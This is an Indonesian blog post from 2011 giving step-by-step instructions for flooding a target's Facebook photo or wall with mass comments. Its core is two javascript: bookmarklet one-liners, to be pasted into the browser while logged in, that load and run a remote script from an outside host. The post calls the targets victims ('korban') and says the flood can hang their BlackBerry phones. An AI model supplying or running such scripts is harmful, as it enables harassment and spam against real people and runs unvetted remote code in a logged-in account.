Kamis, 24 Maret 2011

Facebook Comment Flooder

Syaratnya :

  1. harus udah login ke FB
  2. target harus bisa dikomentarin, nggak harus friend yang penting bisa berkomentar.
  3. posisi halaman yang kebuka.. cuman nongol 1 form komentar, kalo di wall kan form komentar bisa nongol banyak banget . misal di bagian foto, nah itu kan cuman ada 1 form komentar, berarti trik ini bisa dijalankan

Stepnya :

  1. copas script ini di url korban terus tekan [enter] di keyboard
  2. javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);
  3. masukkan jumlah komen
  4. masukkan kalimat komentarnya
  5. tunggu kira2 1-5 menit (tergantung jumlah komen + koneksi agan. 
  6. bisa dicek dengan refresh langsung atau buka tab baru.

Sebenarnya ini adalah pengembangan dari script Flood wall yang selama ini beredar . berhubung sepertinya belum ada yg versi flood komen, jadi ya saya coba2 buat, dan berhasil .
Untuk pengguna blackberry yang mengaktifkan apps fb & fungsi notification aktif, maka akan terjadi hang kalo diserang pake cara ini ataupun wall flood (diatas 50). ane baru nyoba di 2 temen sih, atas ijin si korban )

sementara itu dulu deh isi threadnya.. ntar kalo ada yang perlu update.. ane update

Peringatan : menggunakan cara ini, ada kemungkinan akun FB anda terkena blokir. Dari komentar, dah ada yg kena. Ane juga belum tau berapa batasan flood sampai bisa kena blokir. ane nyoba 200 komen sekaligus juga belum diblokir kok


buat yg pengen nyoba flood wall (walaupun dah sering dibahas dimana2), ini ane kasih scriptnya :
javascript:(a=(b=document).createElement("script")).src="//brk.to/wall",b.body.appendChild(a);void(0);
caranya mirip.. paste di url tapi saat berada di halaman wall target.

pernah di post ke kaskus => http://kask.us/7024254

2 komentar: